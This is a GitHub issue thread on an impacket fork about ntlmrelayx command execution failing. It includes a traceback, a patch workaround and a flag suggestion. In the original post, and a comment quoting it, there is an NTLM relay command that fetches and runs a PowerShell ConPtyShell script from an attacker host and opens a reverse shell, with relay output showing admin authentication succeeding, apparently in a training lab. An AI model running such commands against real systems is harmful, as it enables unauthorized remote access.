### ISSUE TITLE
`ntlmrelayx` command execution broken here

### ISSUE THREAD

**Issue by n3rada** [ThePorgs/impacket#43]
### Configuration  
impacket version: `v0.10.1.dev1+20230909.241.3001b26` 
Target OS: `Linux kali 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03) x86_64 GNU/Linux`
Using `pipx` installation, thus it is in a fully isolated environment.

### Context
Used to use this repository instead of the official `impacket` repository because... it's just better. Anyway, that's not the point! So I wanted to do an NTLM relay by running a command on the target machine with:
``shell
ntlmrelayx.py --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
```
Connected to another machine, I use the command `dir \\192.168.45.242\t` to trigger the relay. And that's where things go wrong. Nothing happens:
```shell
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-7 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-8 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-10 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-11 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-12 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-13 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-14 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-15 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
```
Whereas with `impacket-ntlmrelay`, it works and I have my shell:
```shell
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-9 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[*] SMBD-Thread-11 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
```

What could be the root cause?

**Comment by Tanguy-Boisset** [comment]
I have the same error. With the `-debug` option, the problem seems to be related to a missing `ServerDomain` key in the sessionData object :

```
[*] SMBD-Thread-4: Received connection from 192.168.203.211, attacking target smb://192.168.203.212
[+] Exception:
Traceback (most recent call last):
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 286, in SmbSessionSetup
    challengeMessage = self.do_ntlm_negotiate(client, token)
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 866, in do_ntlm_negotiate
    return client.sendNegotiate(token)
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/examples/ntlmrelayx/clients/smbrelayclient.py", line 361, in sendNegotiate
    self.session._SMBConnection._SMB__server_domain = self.sessionData['ServerDomain']
KeyError: 'ServerDomain'
```

It is probably linked to a very specific setup of training labs, as it seems that both issues concern the same lab.

Nonetheless, here's a dirty fix for `/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/examples/ntlmrelayx/clients/smbrelayclient.py`, line 361 :

```
         self.session._SMBConnection._SMB__server_name = self.sessionData['ServerName']
         self.session._SMBConnection._SMB__server_dns_domain_name = self.sessionData['ServerDNSDomainName']
         #self.session._SMBConnection._SMB__server_domain = self.sessionData['ServerDomain']
         try:
             self.session._SMBConnection._SMB__server_domain = self.sessionData['ServerDomain']
         except KeyError:
             self.session._SMBConnection._SMB__server_domain = self.sessionData['ServerName']

```

**Comment by Z3rO-C00L** [comment]
> ### Configuration
> impacket version: `v0.10.1.dev1+20230909.241.3001b26` Target OS: `Linux kali 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03) x86_64 GNU/Linux` Using `pipx` installation, thus it is in a fully isolated environment.
> 
> ### Context
> Used to use this repository instead of the official `impacket` repository because... it's just better. Anyway, that's not the point! So I wanted to do an NTLM relay by running a command on the target machine with:
> 
> ```shell
> ntlmrelayx.py --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
> ```
> 
> Connected to another machine, I use the command `dir \\192.168.45.242\t` to trigger the relay. And that's where things go wrong. Nothing happens:
> 
> ```shell
> Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b26 - Copyright 2022 Fortra - forked by ThePorgs
> 
> [*] Protocol Client MSSQL loaded..
> [*] Protocol Client LDAP loaded..
> [*] Protocol Client LDAPS loaded..
> [*] Protocol Client IMAPS loaded..
> [*] Protocol Client IMAP loaded..
> [*] Protocol Client DCSYNC loaded..
> [*] Protocol Client SMB loaded..
> [*] Protocol Client SMTP loaded..
> [*] Protocol Client HTTPS loaded..
> [*] Protocol Client HTTP loaded..
> [*] Protocol Client RPC loaded..
> [*] Running in relay mode to single host
> [*] Setting up SMB Server
> [*] Setting up WCF Server
> [*] Setting up RAW Server on port 6666
> 
> [*] Servers started, waiting for connections
> [*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-7 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-8 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-10 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-11 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-12 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-13 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-14 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] SMBD-Thread-15 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> ```
> 
> Whereas with `impacket-ntlmrelayx`, it works and I have my shell:
> 
> ```shell
> $ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
> Impacket v0.11.0 - Copyright 2023 Fortra
> 
> [*] Protocol Client MSSQL loaded..
> [*] Protocol Client LDAPS loaded..
> [*] Protocol Client LDAP loaded..
> [*] Protocol Client IMAPS loaded..
> [*] Protocol Client IMAP loaded..
> [*] Protocol Client DCSYNC loaded..
> [*] Protocol Client SMB loaded..
> [*] Protocol Client SMTP loaded..
> [*] Protocol Client HTTPS loaded..
> [*] Protocol Client HTTP loaded..
> [*] Protocol Client RPC loaded..
> [*] Running in relay mode to single host
> [*] Setting up SMB Server
> [*] Setting up WCF Server
> [*] Setting up RAW Server on port 6666
> 
> [*] Servers started, waiting for connections
> [*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
> [*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
> [*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] Service RemoteRegistry is in stopped state
> [*] SMBD-Thread-9 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] SMBD-Thread-10 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] Starting service RemoteRegistry
> [*] SMBD-Thread-11 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] SMBD-Thread-12 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> [*] SMBD-Thread-13 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
> ```
> 
> What could be the root cause?

Try adding 
```python
--no-multirelay
```  to your command syntax.

**Comment by ShutdownRepo** [comment]
Closing here, feel free to re-open if needed now that we have created a new "main" branch that starts from Fortra's master branch. We will begin merging PRs on that branch now. Hoping it will solve your issue if it still exists.
